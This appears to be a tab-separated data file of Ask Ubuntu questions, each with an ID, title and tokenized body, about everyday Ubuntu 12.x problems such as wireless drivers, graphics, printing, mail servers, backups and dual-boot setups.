258919	any ideas on a better browser enabled cloud desktop using ubuntu 12.04 , gnome and amazon web services ?	i am currently using nomachine 's nx web companion free product using java as well as freenx and an rdp for windows to access a gnome gui ubuntu 12.04 instance running on amazon web services free tier ec2 . what i have works pretty well but i really would like to find a better method for browser access for accessing my precise pangolin virtual desktop from machines i have no admin rights on . anyone have any ideas or know of software or configurations that might provide cleaner and faster secure access to my desktop from as many devices as possible ? if anyone is interested in how to deploy the browser enabled solution i have working , i would be happy to share . i am hoping for a better method , but the nx web companion works pretty well . with it you can run it free using amazon 's free tier as a micro instance .
258922	how to display notebook model number ?	i have a notebook hp pavilion dm4 running ubuntu 12.04 and i 'm trying to determine the model number ( like hp pavilion dm4-2015dx or hp pavilion dm4-2033cl , etc ) . there 's no such information on notebook 's body as suggested on hp 's website on option 1 . i tried to use lshw and dmidecode , but could n't find . maybe i should use an especific option but all the information i found is for windows , nothing for linux . there is a way to show this information on linux ? sudo dmidecode |grep version shows version : intel ( r ) core ( tm ) i5 cpu m 460 @ 2.53ghz here 's the system information part of sudo dmidecode | less system information manufacturer : hewlett-packard product name : hp pavilion dm4 notebook pc version : 058a120000242b10000020100 serial number : 5ca1062fyj uuid : e4bd398b-4d9e-bc63-1a03-099330bf5443 wake-up type : power switch sku number : xz299uar # aba family : 103c_5335kv g=n l=con b=hp s=pav :
258923	what to do against high cpu load caused by compiz and/or gnome-shell ?	since yesterday i am experiencing high cpu load ( caused by compiz ) . first i thought that this may be related by compiz/unity and switched therefore back to gnome-shell ( uninstalled all unity stuff ) . but there gnome-shell causes high cpu load as well ( ~100 % of one core ) . do you have any guess what could cause this ? my hardware : lenovo t420s with disabled nvidia-optimus and nvidia graphics , meaning i am only running the intel graphics .
258924	how can i get an usb to lpt adapter to work ? ( 12.04 )	i have an old printer hp laserjet 4 plus , that has an lpt port but no usb . i can not get it working . i got 4world adapter from usb to lpt , but it seems it is not recognized . i did check dmesg | tail before and after plugging in the adapter into usb port : marcin @ marcin-ao725 : ~ $ dmesg | tail [ 1379.240334 ] usb 6-1 : device not accepting address 11 , error -71 [ 1379.352367 ] usb 6-1 : new full-speed usb device number 12 using xhci_hcd [ 1379.352985 ] usb 6-1 : device not responding to set address . [ 1379.556905 ] usb 6-1 : device not responding to set address . [ 1379.760171 ] usb 6-1 : device not accepting address 12 , error -71 [ 1379.872364 ] usb 6-1 : new full-speed usb device number 13 using xhci_hcd [ 1379.872989 ] usb 6-1 : device not responding to set address . [ 1380.076905 ] usb 6-1 : device not responding to set address . [ 1380.280332 ] usb 6-1 : device not accepting address 13 , error -71 [ 1380.280401 ] hub 6-0:1.0 : unable to enumerate usb device on port 1 marcin @ marcin-ao725 : ~ $ dmesg | tail [ 2272.580252 ] usb 6-1 : device not accepting address 15 , error -71 [ 2272.692370 ] usb 6-1 : new full-speed usb device number 16 using xhci_hcd [ 2272.692973 ] usb 6-1 : device not responding to set address . [ 2272.896945 ] usb 6-1 : device not responding to set address . [ 2273.100329 ] usb 6-1 : device not accepting address 16 , error -71 [ 2273.212203 ] usb 6-1 : new full-speed usb device number 17 using xhci_hcd [ 2273.212814 ] usb 6-1 : device not responding to set address . [ 2273.416916 ] usb 6-1 : device not responding to set address . [ 2273.620296 ] usb 6-1 : device not accepting address 17 , error -71 [ 2273.620389 ] hub 6-0:1.0 : unable to enumerate usb device on port 1 marcin @ marcin-ao725 : ~ $ how can i get the printer to be seen through this adapter ?
258932	should i install zip or use gzip ?	i have downloaded some .zip files . i wish to decompress them ( i have unzip ) , modify them , and compress them again ( into separate compressed files , one decompressed file per compressed file ) . i have no plan to use the files on another machine . i 'm trying to figure out whether to apt-get install zip or to gzip them . ( i have gzip . ) what are the advantages of each â in general and specifically in my case ?
258933	what can i do against microphone noise in ubuntu 12.04 with soundcard vt1708s ?	i 've got a little problem : my microphone input makes some noise if i try to talk . on windows it works perfect , so it ca n't be damaged . my mainboard is an asus m5a78l-m/usb3 . following output : lspci | grep audio 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) 01:00.1 audio device : nvidia corporation gf116 high definition audio controller ( rev a1 ) and cat /proc/asound/cards 0 [ sb ] : hda-intel - hda ati sb hda ati sb at 0xfbff4000 irq 16 1 [ nvidia ] : hda-intel - hda nvidia hda nvidia at 0xfea7c000 irq 19 last but not least head -n 1 /proc/asound/card0/codec* codec : via vt1708s`
258937	how can i send mail with postfix from outside the network	i 've set up a mail server on ubuntu 12-04 following the server guide using postfix and mail-stack delivery instructions . my server has it 's fqdn and a fixed ip address and is alone in it 's network . my users however are all remote connecting from different networks ( homes , hotels , ... ) . we use the imaps protocol to read our mail and it works perfect with thunderbird and mac mail on port 993 . however i ca n't get the server to accept connections on the smtp ports 25 or 587 when i want to send mail . when i run nmap localhost i see that 25/tcp is open but not 587 . when i force thunderbird to use port 25 with ssl i get a time-out .
258939	where can i find a simple hello world example for ubuntu sdk ( qt ) ?	i 've been trying to get a simple window with button . and i have no idea on how to `` bind '' a button from the qml thing to a c/c++ function for example . i followed the example from developer.ubuntu.com but it did n't involve what i am trying to do . can someone give me a example of how to do this ? or hint me to some documentation on how to do this , i have n't been able to find anything so far .
258940	how do i remove ubuntu to install windows ?	i have installed ubuntu 12.10 on my computer but i ca n't uninstall it . at the time of installation , i chose to remove windows accidentally and then it just changed the whole computer to ubuntu . now i want to remove ubuntu . i have got my recovery disk for windows 8 , but when i put the disk ubuntu cant run dvd 's autorun . how can i get my windows back ?
258949	recommendations for restoring accounts after replacing a disk drive ?	several of our development servers have flaky ssds that need to be replaced . the machines are still usable , but we see lots of errors in dmesg , and every once in a while they need to be rebooted because of i/o errors . we have new ssds ( proven to be reliable in other servers ) ready to be installed . some facts : the servers run both ubuntu 10.04 and 12.04 . there are about half a dozen different accounts that ideally would be restored to the new disks . much of the data is in git repositories , but there are also many files not controlled by git . many extra packages have been installed , most of which are documented in the various readme files of the projects . there is still time to make backups of any and all files , and plenty of other servers on which to store the backups . if restoration is too difficult , we can simply pull down the git repositories and reconfigure the new systems manually , though we would prefer not to . what i am looking for are recommendations for approaches to restoring the machines to their current state after the new drives go in . some more specific questions : should i just tar up / or /home ? if i tar up /home , how do i preserve the user ids ? is it better to just tar up individual accounts ( tar zcvf user.tgz /home/user/* ) and restore them after adding each user to the new system ? i am hoping that there are standard approaches to this problem i can take . i read this question , but it was n't quite my problem . this other question recommends clonezilla or dd . is that the way to go ? i am a little leery of cloning the disk because i want to avoid propagating corrupt files that went bad due to the flaky nature of the current disks .
258950	error in software center , will not open ubuntu 12.10 ; can not update	unmet dependencies , how do i get the dependencies if i can not update the release 12.10 ; error in package manager ; error opening the cache ( e : malformed line 58 in source list/etc/apt/sources.list ( dist parse ) , e : the list of sources could not be read. , e : the package lists or status file could not be parsed or opened , ) . can i repair the system online , or repair without reinstalling ; can another form of update repair and install the dependencies ? i read the q & a 's , problem did not resolve ; i am familiar with the dependencies under python 2.7 requirements , but not 3.0 looking at the text under etc/apt/source.list it only has 29 lines , not 58 with code , the rest is # non-code explanations . but i do not see how the last 4 lines are malformed .
258951	add a feature like one in windows task manager ?	i really like the system monitor in ubuntu but there is one feature that i am missing that is in windows task manager . in addition to showing the processes windows task manager also has a tab that allows you to view open windows and to edit settings . this is more convenient than hunting for the process . is it possible to do this in ubuntu ?
258959	no wireless on dell n5110 with any driver	i 've tried installing b43 , sta , wl , ndiswrapper , none have worked , so now i 'm trying brcmsmac problem is , i have this problem when trying to modprobe any module : warning : all config files need .conf : /etc/modprobe.d/blacklist , it will be ignored in a future release . fatal : error inserting brcmsmac ( /lib/modules/3.2.0-38-generic/kernel/drivers/net/wireless/brcm80211/brcmsmac/brcmsmac.ko ) : invalid argument apparently i have bcma and ssb running each time i boot , from lsmod : http : //pastebin.com/vbwmmuyb iwconfig gives : robawalsh @ dell-inspiron-n5110 : ~ $ iwconfig lo no wireless extensions . eth0 no wireless extensions . and here is the output of lspci : http : //pastebin.com/elhxwyac i have run sudo apt-get update & & sudo apt-get upgrade under network settings , wireless is n't even an option .
258965	can i run kvm virtual servers on desktop version	i have installed a 64v ubuntu desktop . is it safe to run any production server in a kvm ? pc = i5 vt enabled , 8gig memory 1g hard drive host = ubuntu desktop 64 bit . guest ( s ) = ubuntu server ( command line ) is this safe ? should i run all from a command line for security purposes ?
258969	how to change the top bar 's icon color	the power , wireless , sound , and battery icon are black on my top bar . i am wondering how i can change the color of these icons to a lighter color .
258971	rmbp 10,1 bluetooth not working	i got my 13 '' macbook pro retina laptop pretty much all working on ubuntu apart from bluetooth . i can pair a device no problem . i pair it as a headset service . but i can not see any audio device in the bluetooth settings . if i do pactl list cards short 0 alsa_card.pci-0000_00_1b.0 module-alsa-card.c is shown , and nothing else.. so i have it paired , how do i get a output device to show ?
258978	how can i enable hp dm3 wifi ?	i have a hp dm3 wifi . i am unable to turn on the wifi . it says `` wireless is disabled by hardware switch '' . i have pressed the hardware switch many times , but it 's not turning on . its red . i bought a new usb by netis which works fine on windows , but am unable to get it working on ubuntu . i have tried the following command : rfkill list all in my networks , it shows both cards but says it is disabled by hardware switch . is there any way to forcefully enable it ? following are the models : hp dm3 1039m netis wf-2110 wireless-n mini usb adapter
258982	/sys/bus/usb/drivers/r8712u/new_id is unchangable	i got my newly purchased wireless stick to work , but i had to change the /sys/bus/usb/drivers/r8712u/new_id file during the process . i somehow managed to add the string `` 050d 11f1 '' to it , but it seems that this file is somehow not possible to edit . when i try to edit it sudo vim new_id with vim and want to save it ( wq ! ) afterwards , vim exclamates : ew_id [ + ] line:1/1 [ 100 % ] col:1buf : # 1 [ 48 ] [ 0x30 ] '' new_id '' '' new_id '' e667 : fsync failed the same with geany/nano/gedit . i simply can not edit propperly this file , i can just somehow add stuff ... i assume that some privileged process is constantly polling the file and doing i/o operations on it . what 's the exact reason and how to successfully edit it ? thanks
258985	implement gnome-cupertino theme at its best	i have seen this theme , i installed it , but it still looks pretty different from the promises ( look at the picture ) . as you can see my result ( on the right ) is pretty different from promised version ( on the left ) . does someone ever tried with a real success this themes and how ?
258987	ubuntu 12.10 64bit ( fresh install ) usb modem zte 190s	i have installed a fresh copy of ubuntu 12.10 64-bit on samsung laptop ( model np350v5c-s0bae ) . the only problem i face is how to make the usb modem stick ( egypt etisalat - zte mf190s ) working . this is the output of lsusb : bus 003 device 007 : id 19d2:2000 zte wcdma technologies msm mf627/mf628/mf628+/mf636+ hsdpa/hsupa i have tried the stick modem on other machines and it is working properly .
258989	can not start gnome-shell in an android chroot	in my android-hosted ubuntu 12.10 chroot , i am attempting to get gnome-shell running on xvfb . i 've handled rendering issues as far as i know , and now i 'm having trouble with gnome-shell . i suspect d-bus . i 've gotten d-bus running in my chroot by using this special python-based replacement of upstart and running /etc/init.d/rcs , /etc/init.d/rc 2 and start upstart . x starts up swimmingly . afaik , these are the packages i installed with apt-get : ubuntu-desktop gnome-shell xvfb unfortunately , i 've hit a roadblock . i do n't know enough about d-bus to get gnome-shell past this error : libegl warning : glx/ dri2 is not supported js log : ibus version is too old ** ( gnome-screensaver:2573 ) : warning ** : could n't get presence status : the name org.gnome.sessionmanager was not provided by any .service files ** ( gnome-screensaver:2573 ) : warning ** : screensaver already running in this session ( gnome-shell:2566 ) : gvc-warning ** : failed to connect context : ok window manager warning : log level 16 : could not initialize nmclient /org/freedesktop/networkmanager : the name org.freedesktop.networkmanager was not provided by any .service files js error : ! ! ! exception was : gio.dbuserror : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.freedesktop.consolekit was not provided by any .service files js error : ! ! ! message = ' '' gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.freedesktop.consolekit was not provided by any .service files '' ' js error : ! ! ! filename = ' '' /usr/share/gnome-shell/js/ui/components/polkitagent.js '' ' js error : ! ! ! linenumber = '329' js error : ! ! ! stack = ' '' 0 anonymous ( ) @ /usr/share/gnome-shell/js/ui/components/polkitagent.js:329 1 wrapper ( ) @ /usr/share/gjs-1.0/lang.js:204 2 anonymous ( `` name '' = `` '' polkitagent '' '' ) @ /usr/share/gnome-shell/js/ui/components/__init__.js:56 3 wrapper ( `` '' polkitagent '' '' ) @ /usr/share/gjs-1.0/lang.js:204 4 anonymous ( `` name '' = `` '' polkitagent '' '' , 1 , [ object array ] ) @ /usr/share/gnome-shell/js/ui/components/__init__.js:22 5 anonymous ( ) @ /usr/share/gnome-shell/js/ui/components/__init__.js:21 6 wrapper ( ) @ /usr/share/gjs-1.0/lang.js:204 7 anonymous ( ) @ /usr/share/gnome-shell/js/ui/components/__init__.js:13 8 wrapper ( ) @ /usr/share/gjs-1.0/lang.js:204 9 anonymous ( ) @ /usr/share/gjs-1.0/lang.js:145 10 anonymous ( ) @ /usr/share/gjs-1.0/lang.js:239 11 start ( ) @ /usr/share/gnome-shell/js/ui/main.js:150 12 < top level > @ < main > :1 '' ' window manager warning : log level 32 : execution of main.js threw exception : gio.dbuserror : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.freedesktop.consolekit was not provided by any .service files i assume it 's having trouble finding and executing some sort of service org.freedesktop.consolekit . i assume i have some sort of configuration gone horribly awry . are there any d-bus gurus here that can help me ?
258991	where is the memtest option on the 12.04 64-bit live cd ?	i 'm looking for the memtest option on the 64 bit version of 12.04 live cd , but the only options i have are `` try without install '' , `` install '' , and `` check disk for defects '' . what am i missing ?
258993	ubuntu wont copy music to ipod	i have tried clementine , rythembox , banshee , and gtkpod . nothing works , even though my ipod says synchronizing and in the player it says the music is on the ipod . when i disconnect nothing has been copied to the ipod . ubuntu 12.04 ipod 5th gen nano ( video camera ) please help , have no more hair to pull out of my head .
258995	can only connect to one network	just installed ubuntu 12.04 a couple of weeks ago on my hp laptop ( completely replaced windows ) . everything seemed fine until a few days ago when i was unable to connect to the internet with my wireless network at home . i also tried three other wireless networks and also tried to connect by ethernet cable . these are all networks that i have been able to connect to in the past with no problems . in each case it says that i am connected to the network , but when i open firefox i get the message `` firefox ca n't find server at start.ubuntu.com '' . i also tried google chrome and that did n't work either . however , there is one network that i can connect to ; the secure network at my school . the first time i noticed this problem was after i installed some updates at school and then went home and could n't connect . i 'm not sure if it had anything to do with these updates or if that 's just a coincidence . when i came back to school it was fine and then it stopped working again went i went home . here 's what i get for the following commands that phipsalabim suggested : ~ $ lspci -v | grep -ia 7 network 02:00.0 network controller : intel corporation centrino wireless-n 1000 subsystem : intel corporation centrino wireless-n 1000 bgn flags : bus master , fast devsel , latency 0 , irq 44 memory at d2500000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : < access denied > kernel driver in use : iwlwifi kernel modules : iwlwifi ~ $ iwconfig lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' my school secure '' mode : managed frequency:2.437 ghz access point : dc:7b:94:87 : ae : e1 bit rate=65 mb/s tx-power=14 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=52/70 signal level=-58 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:3300 invalid misc:570 missed beacon:0 eth0 no wireless extensions . note that i 'm at my school where i do have access . ~ $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : hp-wifi : wireless lan soft blocked : no hard blocked : no ~ $ lsmod module size used by snd_hda_codec_hdmi 32474 1 snd_hda_codec_idt 70795 1 bnep 18281 2 rfcomm 47604 0 bluetooth 180153 10 bnep , rfcomm parport_pc 32866 0 ppdev 17113 0 binfmt_misc 17540 1 snd_hda_intel 33773 5 snd_hda_codec 127706 3 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel snd_hwdep 17764 1 snd_hda_codec snd_pcm 97275 4 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec i915 477611 3 drm_kms_helper 46978 1 i915 snd_seq_midi 13324 0 snd_rawmidi 30748 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi arc4 12529 2 drm 241971 4 i915 , drm_kms_helper snd_seq 61929 2 snd_seq_midi , snd_seq_midi_event uvcvideo 72627 0 videodev 98259 1 uvcvideo snd_timer 29990 2 snd_pcm , snd_seq hp_wmi 18092 0 joydev 17693 0 sparse_keymap 13890 1 hp_wmi snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq v4l2_compat_ioctl32 17128 1 videodev hp_accel 25976 0 psmouse 97485 0 wmi 19256 1 hp_wmi lis3lv02d 19876 1 hp_accel i2c_algo_bit 13423 1 i915 video 19651 1 i915 iwlwifi 401140 0 mac_hid 13253 0 wacom 53300 0 serio_raw 13211 0 input_polldev 13896 1 lis3lv02d lp 17799 0 mac80211 506862 1 iwlwifi snd 79041 19 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_ra wmidi , snd_seq , snd_timer , snd_seq_device cfg80211 205774 2 iwlwifi , mac80211 soundcore 15091 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm parport 46562 3 parport_pc , ppdev , lp hid_logitech_dj 18730 0 ums_realtek 18248 0 usbhid 47238 1 hid_logitech_dj hid 99636 2 hid_logitech_dj , usbhid r8169 62154 0 usb_storage 49198 1 ums_realtek and for the wired connection . ~ $ lspci -v | grep -ia 10 ethernet 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) subsystem : hewlett-packard company device 3662 flags : bus master , fast devsel , latency 0 , irq 43 i/o ports at 2000 [ size=256 ] memory at d0410000 ( 64-bit , prefetchable ) [ size=4k ] memory at d0400000 ( 64-bit , prefetchable ) [ size=64k ] expansion rom at d0420000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : r8169 kernel modules : r8169
258998	how to remove mathematica menu from xfce applications menu ?	how can i remove the wolfram mathematica menu from the xfce applications menu ? the mathematica menu does n't show up in alacarte ... i 'm using xubuntu 12.10 64-bit .
259001	can i use native the qt5 c++ library to create applications for the phone ?	can i use native qt5 c++ library to create for ubuntu phone . is there any guide or wiki for it . how can i test my app on real device ( galaxy nexus ) . where i can get recommendations for ubuntu app designing , documentation of ubuntu sdk qml components .
259013	how to move www directory to home ?	i 've recently installed lamp in my fresh 12.04 installation . i want to know if i can move my www directory to home so i can syncronize it with ubuntu one , or is there any way to syncronize www directory with dropbox or some other application . i just want to keep that directory syncronized with the cloud storage so i never lose the data . thanks in advance . : - )
259015	where did ubuntu go ?	i just formatted my pc and added windows 7 , alongside ubuntu . i installed them in a separated disk partition so ubuntu and my files should be ok , though i can not find them anywhere . when i try to boot manually , my only choice is windows 7 , same also on startup settings in control panel . ubuntu must be somewhere though . the disk has the half the size it 's supposed too . but i ca n't access their partition . i did n't retrieve my files , and that 's definitely a problem . can you help me please ?
259019	boot from usb , setup through ssh	i 've got a new home server with no keyboard , monitor , etc. , but with the ability to boot from usb . i want to install ubuntu server on it , but ca n't work out how . if possible , i want a disk image that i can write to a usb drive to boot from which connects to the network and launches the ssh server , so that i can connect from my laptop and run setup from there . is this possible ? what do i need to do ?
259022	need to setup email notification when system starts and shutdown	i would like to have the system send me a email notification everrytime the system starts or shuts down . i am currently running ubuntu 12.10 i found this tutorial but i could n't make it to work .
259023	atheros ar9285 ca n't connect to specific ap	my laptop ( asus ul80j ) has atheros ar9285 . the ubuntu is 12.10 -64 bit the problem is my wirless adopter work good with all ap that i have except one i tried : dmesg |grep wlan and it gave me the result : [ 901.699027 ] wlan0 : authenticate with 00:1f : a4 : f0:22:8f [ 901.713517 ] wlan0 : direct probe to 00:1f : a4 : f0:22:8f ( try 1/3 ) [ 901.916719 ] wlan0 : direct probe to 00:1f : a4 : f0:22:8f ( try 2/3 ) [ 902.120632 ] wlan0 : direct probe to 00:1f : a4 : f0:22:8f ( try 3/3 ) [ 902.324570 ] wlan0 : authentication with 00:1f : a4 : f0:22:8f timed out [ 903.441075 ] wlan0 : authenticate with 00:1f : a4 : f0:22:8f [ 903.453339 ] wlan0 : direct probe to 00:1f : a4 : f0:22:8f ( try 1/3 ) [ 903.656006 ] wlan0 : direct probe to 00:1f : a4 : f0:22:8f ( try 2/3 ) [ 903.859921 ] wlan0 : direct probe to 00:1f : a4 : f0:22:8f ( try 3/3 ) [ 904.063817 ] wlan0 : authentication with 00:1f : a4 : f0:22:8f timed out [ 905.168388 ] wlan0 : authenticate with 00:1f : a4 : f0:22:8f [ 905.180769 ] wlan0 : direct probe to 00:1f : a4 : f0:22:8f ( try 1/3 ) [ 905.383260 ] wlan0 : direct probe to 00:1f : a4 : f0:22:8f ( try 2/3 ) [ 905.587188 ] wlan0 : direct probe to 00:1f : a4 : f0:22:8f ( try 3/3 ) [ 905.791117 ] wlan0 : authentication with 00:1f : a4 : f0:22:8f timed out as it 's obvious the problem is in authentication process . the access point that i want to connect is wep this is the result of sudo lshw -c network *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : 1c:4b : d6 : fb : fa:36 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.5.0-23-generic firmware=n/a ip=192.168.1.2 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : d4c00000-d4c0ffff also sudo rfkill list 0 : asus-wwan : wireless wan soft blocked : no hard blocked : no 1 : asus-wimax : wimax soft blocked : no hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no 3 : hci0 : bluetooth soft blocked : no hard blocked : no i also tried to add the following line as it was famous solution out there , but i just mention the file ath9k.conf didnt exist before running this command : /etc/modprobe.d > cat ath9k.conf options ath9k nohwcrypt=1
259024	graphics driver troubles	i have an hp pavilion g6 and have just recently switched to ubuntu 12.10 but im having issues with the graphics driver , the graphics are really slow and the brightness wont change and is stuck on max . a friend fixed it for me but an update put it back , can i uninstall that update or is there something i need to download ?
259025	amd ati radeon hd 6870 drivers not working	need some help with this . i 've searched for a few hours and found no answer that worked for me . when i try to install my drivers i get one or more tools required for installation can not be found on the system . install the required tools before installing the fglrx driver . optionally , run the installer with -- force option to install without the tools . forcing install will disable amd hardware accelleration and may make your system unstable . not recommended . see /usr/share/ati/fglrx-install.log for more details . so i checked that log and it gave me supported adapter detected . check if system has the tools required for installation . fglrx installation requires that the system have kernel headers . /lib/modules/3.8.0-6-generic/build/include/linux/version.h can not be found on this system . one or more tools required for installation can not be found on the system . install the required tools before installing the fglrx driver . optionally , run the installer with -- force option to install without the tools . forcing install will disable amd hardware acceleration and may make your system unstable . not recommended .
259029	connect to windows7 machine and print document	i have windows7 on one machine . ubuntu 12.10 on another . i have a printer connected to the windows7 machine . basic network home lan setup . the brother printer works fine on windows 7 . i setup `` share printer '' on the windows7 machine . and i want to be able to print from the ubuntu machine . on ubuntu : if i select `` new printer '' from the system settings and then network printer and the windows printer via samba , i ca n't find the windows7 printer . i can find the machine but not the printer . i even try to manually enter in : smb : //workgroup/server/brotherprinter and that still wo n't work in terms of printing . when i see the `` smb browser '' , i see the workgroup but not the printer . the screen just hangs trying to refresh the devices . ... what can i do to print to that printer ?
259030	how to open a file from terminal in unity	what would the equivalent of 'gnome-open foo.pdf ' be in unity ? thanks !
259034	ubuntu 12.10 not available to boot into	so i downloaded 12.10 today , burned the image to dvd , have attempted to install sevreal times , i get through the entire process , once i remove dvd and reboot , the system automatically goes into win 7 , no option to boot into ubuntu , what am i doing wrong ? i am selecting `` boot along side windows '' .
259037	xubuntu is getting slow	i 've been using xubuntu for a year now and i already reinstalled it two times because after using it for a while it starts to becomes slow , i think is because the tons of security downloads it asks for . i 'd like to know how to avoid this . how to avoid that xubuntu turns more slow and heavy than ubuntu itself . thanks !
259041	pygtk inline toolbar background	as in topic i need your help with inline toolbar for my app . i 'll need this background bar to be expanded to the end of the widget while buttons remains on the left , as it is in keyboard layout setting in ubuntu .
259043	where is the configuration for laptop-mode-tools max cpu frequency ?	i use laptop-mode-tools for power management on my laptop and for the life of my i can not find where to configure the cpu frequency limits . when i 'm on battery it sets the maximum limit , regardless of governor or my manual intervention , to 1ghz . normally this is good but there are some situations where i want the full 2.4ghz out of my cpu . however , if i set this manually through the unity applet or via cpufreq-selector to higher than 1ghz it is completely ignored while on battery . this is extremely annoying . i 've grep'ed everything in /etc looking for configuration options . the only thing i 've found is in /etc/laptop-mode/laptop-mode.conf where the limits are simply fastest , slowest etc . i 've found references to several other files , none of which exist , i guess because cpufreqd is not installed . i tried installing that package but the daemon immediately crashed so i guess there 's a conflict between that and the laptopmode tools manager . any ideas ?
259044	hiphop , nginx , spdy	i 'm about a month young at linux and brand new to ubuntu . i can do this to install hiphop https : //github.com/facebook/hiphop-php/wiki/building-and-installing-hhvm-on-ubuntu-12.04 ( i installed jemalloc 3.0 b/c it was there ) but i 'm not too sure how to install nginx with these options https : //github.com/facebook/hiphop-php/wiki/using-nginx-as-front-server-to-hiphop with spdy http : //nginx.org/patches/spdy/readme.txt . can anyone show me how to combine those two nginx installs with a self-signed cert and a purchased ? many thanks in advance !
259045	ubuntu one stuck at `` file sync starting '' on lubuntu 12.10	i installed ubuntu one on my lubuntu installation , and it 's not syncing my files or folders . when i open the control panel , it says `` file sync starting '' in the upper-right hand corner . and i can select folders to sync without any issues . but nothing gets synced . one of the other `` suggested questions '' mentioned that it 's slow . but , this has been going for about 24 hours now ( not counting the days that i 've had it running before ) . i 've tried installing everything that came with `` sudo apt-get install ubuntuone* '' and that did n't fix the issue . now , i 've uninstalled everything , and installed ubuntuone-control-panel-qt along with it 's associated dependencies . on february 16 , i sent an email to ubuntuone support and have n't received anything back . so i 'm asking for suggestions here . i really do n't want to have to install ubuntu-desktop -- just to get ubuntu one working . one other issue ( not related ) that i could add is that my hard drive does have occasional input/output errors . but this problem was happening on another drive which has no issues ( i copied the entire drive over to this one ) -- so that 's not the cause of this issue . as an edit/update to this , i ran u1sdtool -- status ( per another thread ) , and here are the results : patrickdickey @ dcky-ubuntu64 : ~ $ u1sdtool -- status state : local_rescan connection : with user with network description : doing local rescan is_connected : false is_error : false is_online : false queues : working thanks for any suggestions , and have a great day . : ) patrick .
259051	best ubuntu version for my netbook	i 've been using ubuntu in my notebook for some time and i recently got a used netbook and i want to use ubuntu on it . the problem is that it has really low hardware . look at the specs : processor : intel atom n270 @ 1.6ghz ram : 2gb ddr2 667mhz ( not sure ) chipset : mobile intel 945gse express chipset ( ddr2 400/533/667 mhz ) , mobile intel 82801gbm chipset is ubuntu 10.04.4 the best recommended ? can i use 12.04 ? thanks in advance and kind regards .
259052	how do i get ubuntu minimal to boot in virtualbox ?	i 'm attempting to install ubuntu minimal 12.10 32 bit on a virtualbox host . it freezes immediately after the screen where i select between a regular and a command line only install . how would i get ubuntu minimal to boot ?
259058	using ubuntu 12.04 in virtualbox ( os x )	64-bit imac host using virtualbox 4.2.6 for guest linux machine . initially installed 64-bit 12.10 virtual machine , no issues with install , never installed guest additions . eventually deleted vm altogether because the gui was painfully slow . i read that installing 12.04 would be an improvement . created new vdi , 50gb , fresh install of 12.04 32-bit . the initial boot , live cd style , is fine . fully-functional display , mouse , keyboard , everything . after the install completes my issues start . it prompts me to remove install media ( disc ) and hit enter . i have no keyboard input at this point , so i just kill it and restart the vm . it starts up with the classic `` the system is running in low-graphics mode '' error . i try to exit to console to do an apt-get update or install the guest additions , hoping to regain graphical support , but no cli ever appears . it 's just a black screen . to be clear , i 'm also unable to boot from the live disc and `` try ubuntu '' rather than install -- same low-graphics error . anyone know why i did n't experience this problem with my 12.10 install ? i want to stick with 12.04 because it seems so much snappier in the gui . ( apologies if this is redundant -- so many of these virtualbox issues with little variance . )
259064	connecting to wifi with ubuntu 12.10	i can not connect to wifi no matter what with my compaq presario c500 i have ran the following commands in the terminal but they do not do anything for me sudo apt-get install bcmwl-kernel-source this one says that the bcmwl-kernel could not be found so i ran another command sudo apt-get update this one just did not do anything i have gone into my additional drivers tab and it does not show anything if you can help please reply .
259070	how to browse the files on my samsung galaxy discover ?	i just bought a samsung galaxy discover and eagerly connected it to my kubuntu machine via the included usb cable . after selecting the option to `` open with file manager '' , i was redirected to the uri camera : which consisted of a single folder : this folder is empty . after some further reading , it would appear that i need to use mtp since android 4.0 no longer offers mass storage mode . unfortunately , following the instructions in that article did not work for me . i received the following error : listing raw device ( s ) device 0 ( vid=04e8 and pid=6860 ) is a samsung gt p7310/p7510/n7000/i9070/i9100/i9300 galaxy tab 7.7/10.1/s2/s3/nexus/note/y . found 1 device ( s ) : samsung : gt p7310/p7510/n7000/i9070/i9100/i9300 galaxy tab 7.7/10.1/s2/s3/nexus/note/y ( 04e8:6860 ) @ bus 2 , dev 7 attempting to connect device ptp_error_io : failed to open session , trying again after resetting usb interface libmtp libusb : attempt to reset device android device detected , assigning default bug flags error 1 : get storage information failed . error 2 : ptp layer error 02fe : get_handles_recursively ( ) : could not get object handles . error 2 : error 02fe : ptp : protocol error , data expected listing file information on device with name : ( null ) libmtp_get_storage ( ) failed : -1 so , is there some alternative method or tool i can use to interact with the contents of my phone ? i am using kubuntu 12.10 64-bit on this machine .
259075	horrible grafical error , unusable	hi i am brand new to linux and ubuntu and i recently attempted to install ubuntu 12.10 on a really old laptop i found in my basement , a presario 2700t . the installation went well but then it went to the log in screen and it 's just a jumbled mess of colors . i thought 'oh maybe it 's just 12.10 . ' so i downloaded 12.04 and the same thing , albeit slightly better . i think it has something to with drivers but i have no clue how to install drives when i cant use the computer .
259078	tips on creating a upstart script	i have a few questions that i 'm looking for some pointers for . once i create my upstart .conf file , how exactly do i `` install '' it and activate it ? how do you go about debugging the script while developing it ? example , i may be looping to form a list of files in the script , is it possible to output the result to console so i know its working ?
